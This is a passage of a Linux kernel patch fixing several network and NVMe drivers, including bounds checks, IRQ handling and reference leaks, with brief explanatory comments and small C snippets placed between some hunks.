+ static int esw_qos_tsar_config(struct mlx5_core_dev *dev, u32 *sched_ctx,
+-			       u32 parent_ix, u32 tsar_ix,
+-			       u32 max_rate, u32 bw_share)
++			       u32 tsar_ix, u32 max_rate, u32 bw_share)
+ {
+ 	u32 bitmask = 0;
+ 
+ 	if (!MLX5_CAP_GEN(dev, qos) || !MLX5_CAP_QOS(dev, esw_scheduling))
+ 		return -EOPNOTSUPP;
+ 
+-	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_ix);
+ 	MLX5_SET(scheduling_context, sched_ctx, max_average_bw, max_rate);
+ 	MLX5_SET(scheduling_context, sched_ctx, bw_share, bw_share);
+ 	bitmask |= MODIFY_SCHEDULING_ELEMENT_IN_MODIFY_BITMASK_MAX_AVERAGE_BW;
+@@ -51,7 +49,7 @@ static int esw_qos_group_config(struct mlx5_eswitch *esw, struct mlx5_esw_rate_g
+ 	int err;
+ 
+ 	err = esw_qos_tsar_config(dev, sched_ctx,
+-				  esw->qos.root_tsar_ix, group->tsar_ix,
++				  group->tsar_ix,
+ 				  max_rate, bw_share);
+ 	if (err)
+ 		NL_SET_ERR_MSG_MOD(extack, "E-Switch modify group TSAR element failed");
+@@ -67,23 +65,13 @@ static int esw_qos_vport_config(struct mlx5_eswitch *esw,
+ 				struct netlink_ext_ack *extack)
+ {
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {};
+-	struct mlx5_esw_rate_group *group = vport->qos.group;
+ 	struct mlx5_core_dev *dev = esw->dev;
+-	u32 parent_tsar_ix;
+-	void *vport_elem;
+ 	int err;
+ 
+ 	if (!vport->qos.enabled)
+ 		return -EIO;
+ 
+-	parent_tsar_ix = group ? group->tsar_ix : esw->qos.root_tsar_ix;
+-	MLX5_SET(scheduling_context, sched_ctx, element_type,
+-		 SCHEDULING_CONTEXT_ELEMENT_TYPE_VPORT);
+-	vport_elem = MLX5_ADDR_OF(scheduling_context, sched_ctx,
+-				  element_attributes);
+-	MLX5_SET(vport_element, vport_elem, vport_number, vport->vport);
+-
+-	err = esw_qos_tsar_config(dev, sched_ctx, parent_tsar_ix, vport->qos.esw_tsar_ix,
++	err = esw_qos_tsar_config(dev, sched_ctx, vport->qos.esw_tsar_ix,
+ 				  max_rate, bw_share);
+ 	if (err) {
+ 		esw_warn(esw->dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 788a6ab5c4636..43ba00d5e36ec 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -1421,6 +1421,7 @@ void mlx5_eswitch_disable(struct mlx5_eswitch *esw)
+ 	mlx5_lag_disable_change(esw->dev);
+ 	down_write(&esw->mode_lock);
+ 	mlx5_eswitch_disable_locked(esw);
++	esw->mode = MLX5_ESWITCH_LEGACY;
+ 	up_write(&esw->mode_lock);
+ 	mlx5_lag_enable_change(esw->dev);
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 00758312df065..d4db1adae3e3d 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -2082,7 +2082,7 @@ static void mlx5_core_verify_params(void)
+ 	}
+ }
+ 
+-static int __init init(void)
++static int __init mlx5_init(void)
+ {
+ 	int err;
+ 
+@@ -2117,7 +2117,7 @@ err_debug:
+ 	return err;
+ }
+ 
+-static void __exit cleanup(void)
++static void __exit mlx5_cleanup(void)
+ {
+ 	mlx5e_cleanup();
+ 	mlx5_sf_driver_unregister();
+@@ -2125,5 +2125,5 @@ static void __exit cleanup(void)
+ 	mlx5_unregister_debugfs();
+ }
+ 
+-module_init(init);
+-module_exit(cleanup);
++module_init(mlx5_init);
++module_exit(mlx5_cleanup);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+index 0777be24a3074..8bce730b5c5be 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/qos.c
+@@ -62,13 +62,12 @@ int mlx5_qos_create_root_node(struct mlx5_core_dev *mdev, u32 *id)
+ 	return mlx5_qos_create_inner_node(mdev, MLX5_QOS_DEFAULT_DWRR_UID, 0, 0, id);
+ }
+ 
+-int mlx5_qos_update_node(struct mlx5_core_dev *mdev, u32 parent_id,
++int mlx5_qos_update_node(struct mlx5_core_dev *mdev,
+ 			 u32 bw_share, u32 max_avg_bw, u32 id)
+ {
+ 	u32 sched_ctx[MLX5_ST_SZ_DW(scheduling_context)] = {0};
+ 	u32 bitmask = 0;
+ 
+-	MLX5_SET(scheduling_context, sched_ctx, parent_element_id, parent_id);
+ 	MLX5_SET(scheduling_context, sched_ctx, bw_share, bw_share);
+ 	MLX5_SET(scheduling_context, sched_ctx, max_average_bw, max_avg_bw);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/qos.h b/drivers/net/ethernet/mellanox/mlx5/core/qos.h
+index 125e4e47e6f71..624ce822b7f59 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/qos.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/qos.h
+@@ -23,7 +23,7 @@ int mlx5_qos_create_leaf_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ int mlx5_qos_create_inner_node(struct mlx5_core_dev *mdev, u32 parent_id,
+ 			       u32 bw_share, u32 max_avg_bw, u32 *id);
+ int mlx5_qos_create_root_node(struct mlx5_core_dev *mdev, u32 *id);
+-int mlx5_qos_update_node(struct mlx5_core_dev *mdev, u32 parent_id, u32 bw_share,
++int mlx5_qos_update_node(struct mlx5_core_dev *mdev, u32 bw_share,
+ 			 u32 max_avg_bw, u32 id);
+ int mlx5_qos_destroy_node(struct mlx5_core_dev *mdev, u32 id);
+ 
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+index 20ee5b28f70a5..569108c49cbc5 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+@@ -1022,11 +1022,6 @@ static int lan966x_probe(struct platform_device *pdev)
+ 		lan966x->base_mac[5] &= 0xf0;
+ 	}
+ 
+-	ports = device_get_named_child_node(&pdev->dev, "ethernet-ports");
+-	if (!ports)
+-		return dev_err_probe(&pdev->dev, -ENODEV,
+-				     "no ethernet-ports child found\n");
+-
+ 	err = lan966x_create_targets(pdev, lan966x);
+ 	if (err)
+ 		return dev_err_probe(&pdev->dev, err,
+@@ -1104,6 +1099,11 @@ static int lan966x_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
++	ports = device_get_named_child_node(&pdev->dev, "ethernet-ports");
++	if (!ports)
++		return dev_err_probe(&pdev->dev, -ENODEV,
++				     "no ethernet-ports child found\n");
++
+ 	/* init switch */
+ 	lan966x_init(lan966x);
+ 	lan966x_stats_init(lan966x);
+@@ -1138,6 +1138,8 @@ static int lan966x_probe(struct platform_device *pdev)
+ 		lan966x_port_init(lan966x->ports[p]);
+ 	}
+ 
++	fwnode_handle_put(ports);
++
+ 	lan966x_mdb_init(lan966x);
+ 	err = lan966x_fdb_init(lan966x);
+ 	if (err)
+@@ -1160,6 +1162,7 @@ cleanup_fdb:
+ 	lan966x_fdb_deinit(lan966x);
+ 
+ cleanup_ports:
++	fwnode_handle_put(ports);
+ 	fwnode_handle_put(portnp);
+ 
+ 	lan966x_cleanup_ports(lan966x);
+diff --git a/drivers/net/ethernet/microsoft/mana/gdma.h b/drivers/net/ethernet/microsoft/mana/gdma.h
+index 65c24ee49efd9..48b0ab56bdb0a 100644
+--- a/drivers/net/ethernet/microsoft/mana/gdma.h
++++ b/drivers/net/ethernet/microsoft/mana/gdma.h
+@@ -324,9 +324,12 @@ struct gdma_queue_spec {
+ 	};
+ };
+ 
++#define MANA_IRQ_NAME_SZ 32
++
+ struct gdma_irq_context {
+ 	void (*handler)(void *arg);
+ 	void *arg;
++	char name[MANA_IRQ_NAME_SZ];
+ };
+ 
+ struct gdma_context {
+diff --git a/drivers/net/ethernet/microsoft/mana/gdma_main.c b/drivers/net/ethernet/microsoft/mana/gdma_main.c
+index a6f99b4344d93..d674ebda2053d 100644
+--- a/drivers/net/ethernet/microsoft/mana/gdma_main.c
++++ b/drivers/net/ethernet/microsoft/mana/gdma_main.c
+@@ -1233,13 +1233,20 @@ static int mana_gd_setup_irqs(struct pci_dev *pdev)
+ 		gic->handler = NULL;
+ 		gic->arg = NULL;
+ 
++		if (!i)
++			snprintf(gic->name, MANA_IRQ_NAME_SZ, "mana_hwc@pci:%s",
++				 pci_name(pdev));
++		else
++			snprintf(gic->name, MANA_IRQ_NAME_SZ, "mana_q%d@pci:%s",
++				 i - 1, pci_name(pdev));
++
+ 		irq = pci_irq_vector(pdev, i);
+ 		if (irq < 0) {
+ 			err = irq;
+ 			goto free_irq;
+ 		}
+ 
+-		err = request_irq(irq, mana_gd_intr, 0, "mana_intr", gic);
++		err = request_irq(irq, mana_gd_intr, 0, gic->name, gic);
+ 		if (err)
+ 			goto free_irq;
+ 	}
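
The MANA fix above works because request_irq() stores the name pointer rather than copying the string, so the buffer must stay valid for as long as the IRQ is requested; hence the name array moving into the long-lived gdma_irq_context. In isolation (my_irq_ctx and the "mydev_q%d" format are illustrative stand-ins):

#include <linux/kernel.h>
#include <linux/interrupt.h>

struct my_irq_ctx {
	char name[32];	/* must outlive request_irq(); shown in /proc/interrupts */
};

static int setup_named_irq(struct my_irq_ctx *ctx, unsigned int irq,
			   irq_handler_t handler, int queue)
{
	snprintf(ctx->name, sizeof(ctx->name), "mydev_q%d", queue);
	return request_irq(irq, handler, 0, ctx->name, ctx);
}
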
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index b4e0fc7f65bdf..0f54849a38235 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1101,14 +1101,14 @@ static void ravb_error_interrupt(struct net_device *ndev)
+ 	ravb_write(ndev, ~(EIS_QFS | EIS_RESERVED), EIS);
+ 	if (eis & EIS_QFS) {
+ 		ris2 = ravb_read(ndev, RIS2);
+-		ravb_write(ndev, ~(RIS2_QFF0 | RIS2_RFFF | RIS2_RESERVED),
++		ravb_write(ndev, ~(RIS2_QFF0 | RIS2_QFF1 | RIS2_RFFF | RIS2_RESERVED),
+ 			   RIS2);
+ 
+ 		/* Receive Descriptor Empty int */
+ 		if (ris2 & RIS2_QFF0)
+ 			priv->stats[RAVB_BE].rx_over_errors++;
+ 
+-		    /* Receive Descriptor Empty int */
++		/* Receive Descriptor Empty int */
+ 		if (ris2 & RIS2_QFF1)
+ 			priv->stats[RAVB_NC].rx_over_errors++;
+ 
+@@ -2973,6 +2973,9 @@ static int __maybe_unused ravb_suspend(struct device *dev)
+ 	else
+ 		ret = ravb_close(ndev);
+ 
++	if (priv->info->ccc_gac)
++		ravb_ptp_stop(ndev);
++
+ 	return ret;
+ }
+ 
+@@ -3011,6 +3014,9 @@ static int __maybe_unused ravb_resume(struct device *dev)
+ 	/* Restore descriptor base address table */
+ 	ravb_write(ndev, priv->desc_bat_dma, DBAT);
+ 
++	if (priv->info->ccc_gac)
++		ravb_ptp_init(ndev, priv->pdev);
++
+ 	if (netif_running(ndev)) {
+ 		if (priv->wol_enabled) {
+ 			ret = ravb_wol_restore(ndev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+index 9c2d40f853ed0..413f660172199 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+@@ -186,11 +186,25 @@ static void dwmac5_handle_dma_err(struct net_device *ndev,
+ int dwmac5_safety_feat_config(void __iomem *ioaddr, unsigned int asp,
+ 			      struct stmmac_safety_feature_cfg *safety_feat_cfg)
+ {
++	struct stmmac_safety_feature_cfg all_safety_feats = {
++		.tsoee = 1,
++		.mrxpee = 1,
++		.mestee = 1,
++		.mrxee = 1,
++		.mtxee = 1,
++		.epsi = 1,
++		.edpp = 1,
++		.prtyen = 1,
++		.tmouten = 1,
++	};
+ 	u32 value;
+ 
+ 	if (!asp)
+ 		return -EINVAL;
+ 
++	if (!safety_feat_cfg)
++		safety_feat_cfg = &all_safety_feats;
++
+ 	/* 1. Enable Safety Features */
+ 	value = readl(ioaddr + MTL_ECC_CONTROL);
+ 	value |= MEEAO; /* MTL ECC Error Addr Status Override */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+index f453b0d093663..35c8dd92d3692 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+@@ -551,16 +551,16 @@ static void stmmac_get_per_qstats(struct stmmac_priv *priv, u64 *data)
+ 		p = (char *)priv + offsetof(struct stmmac_priv,
+ 					    xstats.txq_stats[q].tx_pkt_n);
+ 		for (stat = 0; stat < STMMAC_TXQ_STATS; stat++) {
+-			*data++ = (*(u64 *)p);
+-			p += sizeof(u64 *);
++			*data++ = (*(unsigned long *)p);
++			p += sizeof(unsigned long);
+ 		}
+ 	}
+ 	for (q = 0; q < rx_cnt; q++) {
+ 		p = (char *)priv + offsetof(struct stmmac_priv,
+ 					    xstats.rxq_stats[q].rx_pkt_n);
+ 		for (stat = 0; stat < STMMAC_RXQ_STATS; stat++) {
+-			*data++ = (*(u64 *)p);
+-			p += sizeof(u64 *);
++			*data++ = (*(unsigned long *)p);
++			p += sizeof(unsigned long);
+ 		}
+ 	}
+ }
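
The stmmac hunk above fixes a classic stride bug: the cursor advanced by sizeof(u64 *), the size of a pointer, and each read pulled 8 bytes, while the stored counters are unsigned long; on 32-bit systems that reads past each 4-byte counter and strides by the wrong amount. The corrected walk, as an illustrative sketch:

#include <linux/types.h>

/* Copy count unsigned-long counters starting at base into a u64
 * output array, advancing by the element size, not a pointer size.
 */
static void copy_ulong_stats(const char *base, u64 *out, int count)
{
	int i;

	for (i = 0; i < count; i++) {
		out[i] = *(const unsigned long *)base;
		base += sizeof(unsigned long);
	}
}
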
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index feb209d4b991e..4bba0444c764a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1148,6 +1148,11 @@ static int stmmac_init_phy(struct net_device *dev)
+ 		int addr = priv->plat->phy_addr;
+ 		struct phy_device *phydev;
+ 
++		if (addr < 0) {
++			netdev_err(priv->dev, "no phy found\n");
++			return -ENODEV;
++		}
++
+ 		phydev = mdiobus_get_phy(priv->mii, addr);
+ 		if (!phydev) {
+ 			netdev_err(priv->dev, "no phy at addr %d\n", addr);
+diff --git a/drivers/net/ipa/ipa_interrupt.c b/drivers/net/ipa/ipa_interrupt.c
+index c269432f9c2ee..a89a3e3ff81c3 100644
+--- a/drivers/net/ipa/ipa_interrupt.c
++++ b/drivers/net/ipa/ipa_interrupt.c
+@@ -127,6 +127,16 @@ out_power_put:
+ 	return IRQ_HANDLED;
+ }
+ 
++void ipa_interrupt_irq_disable(struct ipa *ipa)
++{
++	disable_irq(ipa->interrupt->irq);
++}
++
++void ipa_interrupt_irq_enable(struct ipa *ipa)
++{
++	enable_irq(ipa->interrupt->irq);
++}
++
+ /* Common function used to enable/disable TX_SUSPEND for an endpoint */
+ static void ipa_interrupt_suspend_control(struct ipa_interrupt *interrupt,
+ 					  u32 endpoint_id, bool enable)
+diff --git a/drivers/net/ipa/ipa_interrupt.h b/drivers/net/ipa/ipa_interrupt.h
+index f31fd9965fdc6..8a1bd5b893932 100644
+--- a/drivers/net/ipa/ipa_interrupt.h
++++ b/drivers/net/ipa/ipa_interrupt.h
+@@ -85,6 +85,22 @@ void ipa_interrupt_suspend_clear_all(struct ipa_interrupt *interrupt);
+  */
+ void ipa_interrupt_simulate_suspend(struct ipa_interrupt *interrupt);
+ 
++/**
++ * ipa_interrupt_irq_enable() - Enable IPA interrupts
++ * @ipa:	IPA pointer
++ *
++ * This enables the IPA interrupt line
++ */
++void ipa_interrupt_irq_enable(struct ipa *ipa);
++
++/**
++ * ipa_interrupt_irq_disable() - Disable IPA interrupts
++ * @ipa:	IPA pointer
++ *
++ * This disables the IPA interrupt line
++ */
++void ipa_interrupt_irq_disable(struct ipa *ipa);
++
+ /**
+  * ipa_interrupt_config() - Configure the IPA interrupt framework
+  * @ipa:	IPA pointer
+diff --git a/drivers/net/ipa/ipa_power.c b/drivers/net/ipa/ipa_power.c
+index 8420f93128a26..8057be8cda801 100644
+--- a/drivers/net/ipa/ipa_power.c
++++ b/drivers/net/ipa/ipa_power.c
+@@ -181,6 +181,17 @@ static int ipa_suspend(struct device *dev)
+ 
+ 	__set_bit(IPA_POWER_FLAG_SYSTEM, ipa->power->flags);
+ 
++	/* Increment the disable depth to ensure that the IRQ won't
++	 * be re-enabled until the matching _enable call in
++	 * ipa_resume(). We do this to ensure that the interrupt
++	 * handler won't run whilst PM runtime is disabled.
++	 *
++	 * Note that disabling the IRQ is NOT the same as disabling
++	 * irq wake. If wakeup is enabled for the IPA then the IRQ
++	 * will still cause the system to wake up, see irq_set_irq_wake().
++	 */
++	ipa_interrupt_irq_disable(ipa);
++
+ 	return pm_runtime_force_suspend(dev);
+ }
+ 
+@@ -193,6 +204,12 @@ static int ipa_resume(struct device *dev)
+ 
+ 	__clear_bit(IPA_POWER_FLAG_SYSTEM, ipa->power->flags);
+ 
++	/* Now that PM runtime is enabled again, it's safe
++	 * to turn the IRQ back on and process any data
++	 * that was received during suspend.
++	 */
++	ipa_interrupt_irq_enable(ipa);
++
+ 	return ret;
+ }
+ 
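
The IPA comments above lean on the fact that disable_irq() and enable_irq() nest through a per-IRQ disable depth: disable_irq() also waits for any running handler to finish, and the line is only unmasked again once every disable has been matched by an enable. A throwaway sketch of that behaviour:

#include <linux/interrupt.h>

static void irq_depth_demo(unsigned int irq)
{
	disable_irq(irq);	/* depth 0 -> 1; waits for handlers, masks */
	disable_irq(irq);	/* depth 1 -> 2; still masked */
	enable_irq(irq);	/* depth 2 -> 1; still masked */
	enable_irq(irq);	/* depth 1 -> 0; interrupts delivered again */
}
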
+diff --git a/drivers/net/mdio/mdio-mux-meson-g12a.c b/drivers/net/mdio/mdio-mux-meson-g12a.c
+index 4a2e94faf57e2..c4542ecf56230 100644
+--- a/drivers/net/mdio/mdio-mux-meson-g12a.c
++++ b/drivers/net/mdio/mdio-mux-meson-g12a.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/bitfield.h>
++#include <linux/delay.h>
+ #include <linux/clk.h>
+ #include <linux/clk-provider.h>
+ #include <linux/device.h>
+@@ -150,6 +151,7 @@ static const struct clk_ops g12a_ephy_pll_ops = {
+ 
+ static int g12a_enable_internal_mdio(struct g12a_mdio_mux *priv)
+ {
++	u32 value;
+ 	int ret;
+ 
+ 	/* Enable the phy clock */
+@@ -163,18 +165,25 @@ static int g12a_enable_internal_mdio(struct g12a_mdio_mux *priv)
+ 
+ 	/* Initialize ephy control */
+ 	writel(EPHY_G12A_ID, priv->regs + ETH_PHY_CNTL0);
+-	writel(FIELD_PREP(PHY_CNTL1_ST_MODE, 3) |
+-	       FIELD_PREP(PHY_CNTL1_ST_PHYADD, EPHY_DFLT_ADD) |
+-	       FIELD_PREP(PHY_CNTL1_MII_MODE, EPHY_MODE_RMII) |
+-	       PHY_CNTL1_CLK_EN |
+-	       PHY_CNTL1_CLKFREQ |
+-	       PHY_CNTL1_PHY_ENB,
+-	       priv->regs + ETH_PHY_CNTL1);
++
++	/* Make sure we get a 0 -> 1 transition on the enable bit */
++	value = FIELD_PREP(PHY_CNTL1_ST_MODE, 3) |
++		FIELD_PREP(PHY_CNTL1_ST_PHYADD, EPHY_DFLT_ADD) |
++		FIELD_PREP(PHY_CNTL1_MII_MODE, EPHY_MODE_RMII) |
++		PHY_CNTL1_CLK_EN |
++		PHY_CNTL1_CLKFREQ;
++	writel(value, priv->regs + ETH_PHY_CNTL1);
+ 	writel(PHY_CNTL2_USE_INTERNAL |
+ 	       PHY_CNTL2_SMI_SRC_MAC |
+ 	       PHY_CNTL2_RX_CLK_EPHY,
+ 	       priv->regs + ETH_PHY_CNTL2);
+ 
++	value |= PHY_CNTL1_PHY_ENB;
++	writel(value, priv->regs + ETH_PHY_CNTL1);
++
++	/* The phy needs a bit of time to power up */
++	mdelay(10);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/phy/mdio_bus.c b/drivers/net/phy/mdio_bus.c
+index 1cd604cd1fa1b..16e021b477f06 100644
+--- a/drivers/net/phy/mdio_bus.c
++++ b/drivers/net/phy/mdio_bus.c
+@@ -108,7 +108,12 @@ EXPORT_SYMBOL(mdiobus_unregister_device);
+ 
+ struct phy_device *mdiobus_get_phy(struct mii_bus *bus, int addr)
+ {
+-	struct mdio_device *mdiodev = bus->mdio_map[addr];
++	struct mdio_device *mdiodev;
++
++	if (addr < 0 || addr >= ARRAY_SIZE(bus->mdio_map))
++		return NULL;
++
++	mdiodev = bus->mdio_map[addr];
+ 
+ 	if (!mdiodev)
+ 		return NULL;
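
mdiobus_get_phy() can be handed addresses that originate in platform data (the stmmac hunk earlier in this patch adds the matching phy_addr < 0 check on the caller side), so the lookup above now validates the index before touching the fixed-size map. The guard in generic form, as a sketch with MAP_SIZE standing in for the mdio_map dimension:

#include <linux/kernel.h>

#define MAP_SIZE 32	/* stand-in for the fixed mdio_map size */

static void *lookup_slot(void * const map[MAP_SIZE], int addr)
{
	if (addr < 0 || addr >= MAP_SIZE)
		return NULL;	/* reject out-of-range indices up front */
	return map[addr];
}
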
+diff --git a/drivers/net/usb/cdc_ether.c b/drivers/net/usb/cdc_ether.c
+index e11f70911acc1..fb5f59d0d55d7 100644
+--- a/drivers/net/usb/cdc_ether.c
++++ b/drivers/net/usb/cdc_ether.c
+@@ -1001,6 +1001,12 @@ static const struct usb_device_id	products[] = {
+ 				      USB_CDC_SUBCLASS_ETHERNET,
+ 				      USB_CDC_PROTO_NONE),
+ 	.driver_info = (unsigned long)&wwan_info,
++}, {
++	/* Cinterion PLS62-W modem by GEMALTO/THALES */
++	USB_DEVICE_AND_INTERFACE_INFO(0x1e2d, 0x005b, USB_CLASS_COMM,
++				      USB_CDC_SUBCLASS_ETHERNET,
++				      USB_CDC_PROTO_NONE),
++	.driver_info = (unsigned long)&wwan_info,
+ }, {
+ 	/* Cinterion PLS83/PLS63 modem by GEMALTO/THALES */
+ 	USB_DEVICE_AND_INTERFACE_INFO(0x1e2d, 0x0069, USB_CLASS_COMM,
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index a481a1d831e2f..23da1d9dafd1f 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -9836,6 +9836,7 @@ static const struct usb_device_id rtl8152_table[] = {
+ 	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07ab),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07c6),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0927),
++	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0c5e),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_SAMSUNG, 0xa101),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x304f),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3054),
+diff --git a/drivers/net/usb/sr9700.c b/drivers/net/usb/sr9700.c
+index 5a53e63d33a60..3164451e1010c 100644
+--- a/drivers/net/usb/sr9700.c
++++ b/drivers/net/usb/sr9700.c
+@@ -413,7 +413,7 @@ static int sr9700_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		/* ignore the CRC length */
+ 		len = (skb->data[1] | (skb->data[2] << 8)) - 4;
+ 
+-		if (len > ETH_FRAME_LEN || len > skb->len)
++		if (len > ETH_FRAME_LEN || len > skb->len || len < 0)
+ 			return 0;
+ 
+ 		/* the last packet of current skb */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 86e52454b5b5c..3cd15f16090f1 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1873,8 +1873,10 @@ static netdev_tx_t start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 	if (sq->vq->num_free < 2+MAX_SKB_FRAGS) {
+ 		netif_stop_subqueue(dev, qnum);
+-		if (!use_napi &&
+-		    unlikely(!virtqueue_enable_cb_delayed(sq->vq))) {
++		if (use_napi) {
++			if (unlikely(!virtqueue_enable_cb_delayed(sq->vq)))
++				virtqueue_napi_schedule(&sq->napi, sq->vq);
++		} else if (unlikely(!virtqueue_enable_cb_delayed(sq->vq))) {
+ 			/* More just got used, free them then recheck. */
+ 			free_old_xmit_skbs(sq, false);
+ 			if (sq->vq->num_free >= 2+MAX_SKB_FRAGS) {
+diff --git a/drivers/net/wan/fsl_ucc_hdlc.c b/drivers/net/wan/fsl_ucc_hdlc.c
+index 22edea6ca4b81..1c53b55469270 100644
+--- a/drivers/net/wan/fsl_ucc_hdlc.c
++++ b/drivers/net/wan/fsl_ucc_hdlc.c
+@@ -1243,9 +1243,11 @@ static int ucc_hdlc_probe(struct platform_device *pdev)
+ free_dev:
+ 	free_netdev(dev);
+ undo_uhdlc_init:
+-	iounmap(utdm->siram);
++	if (utdm)
++		iounmap(utdm->siram);
+ unmap_si_regs:
+-	iounmap(utdm->si_regs);
++	if (utdm)
++		iounmap(utdm->si_regs);
+ free_utdm:
+ 	if (uhdlc_priv->tsa)
+ 		kfree(utdm);
+diff --git a/drivers/net/wireless/rndis_wlan.c b/drivers/net/wireless/rndis_wlan.c
+index 82a7458e01aec..bf72e5fd39cf4 100644
+--- a/drivers/net/wireless/rndis_wlan.c
++++ b/drivers/net/wireless/rndis_wlan.c
+@@ -696,8 +696,8 @@ static int rndis_query_oid(struct usbnet *dev, u32 oid, void *data, int *len)
+ 		struct rndis_query	*get;
+ 		struct rndis_query_c	*get_c;
+ 	} u;
+-	int ret, buflen;
+-	int resplen, respoffs, copylen;
++	int ret;
++	size_t buflen, resplen, respoffs, copylen;
+ 
+ 	buflen = *len + sizeof(*u.get);
+ 	if (buflen < CONTROL_BUFFER_SIZE)
+@@ -732,22 +732,15 @@ static int rndis_query_oid(struct usbnet *dev, u32 oid, void *data, int *len)
+ 
+ 		if (respoffs > buflen) {
+ 			/* Device returned data offset outside buffer, error. */
+-			netdev_dbg(dev->net, "%s(%s): received invalid "
+-				"data offset: %d > %d\n", __func__,
+-				oid_to_string(oid), respoffs, buflen);
++			netdev_dbg(dev->net,
++				   "%s(%s): received invalid data offset: %zu > %zu\n",
++				   __func__, oid_to_string(oid), respoffs, buflen);
+ 
+ 			ret = -EINVAL;
+ 			goto exit_unlock;
+ 		}
+ 
+-		if ((resplen + respoffs) > buflen) {
+-			/* Device would have returned more data if buffer would
+-			 * have been big enough. Copy just the bits that we got.
+-			 */
+-			copylen = buflen - respoffs;
+-		} else {
+-			copylen = resplen;
+-		}
++		copylen = min(resplen, buflen - respoffs);
+ 
+ 		if (copylen > *len)
+ 			copylen = *len;
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
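
The rndis_query_oid() fix above switches the length bookkeeping to size_t and collapses the copy-size branch into min(), removing the signed arithmetic that let a hostile device steer the copy out of bounds. The clamped copy in isolation, as a hedged sketch (copy_response() is an illustrative helper):

#include <linux/minmax.h>
#include <linux/string.h>

/* Copy at most dst_len bytes of the response window [respoffs,
 * respoffs + resplen) out of buf, never reading past buflen.
 */
static size_t copy_response(void *dst, size_t dst_len, const void *buf,
			    size_t buflen, size_t respoffs, size_t resplen)
{
	size_t copylen;

	if (respoffs > buflen)
		return 0;	/* offset points outside the buffer */

	copylen = min(resplen, buflen - respoffs);
	copylen = min(copylen, dst_len);
	memcpy(dst, (const char *)buf + respoffs, copylen);
	return copylen;
}
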
+index 1ded96d1bfd21..25ade4ce8e0a7 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1088,7 +1088,7 @@ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u8 opcode)
+ 	if (ns) {
+ 		if (ns->head->effects)
+ 			effects = le32_to_cpu(ns->head->effects->iocs[opcode]);
+-		if (ns->head->ids.csi == NVME_CAP_CSS_NVM)
++		if (ns->head->ids.csi == NVME_CSI_NVM)
+ 			effects |= nvme_known_nvm_effects(opcode);
+ 		if (effects & ~(NVME_CMD_EFFECTS_CSUPP | NVME_CMD_EFFECTS_LBCC))
+ 			dev_warn_once(ctrl->device,
+@@ -3903,10 +3903,11 @@ static umode_t nvme_dev_attrs_are_visible(struct kobject *kobj,
+ 	return a->mode;
+ }
+ 
+-static const struct attribute_group nvme_dev_attrs_group = {
++const struct attribute_group nvme_dev_attrs_group = {
+ 	.attrs		= nvme_dev_attrs,
+ 	.is_visible	= nvme_dev_attrs_are_visible,
+ };
++EXPORT_SYMBOL_GPL(nvme_dev_attrs_group);
+ 
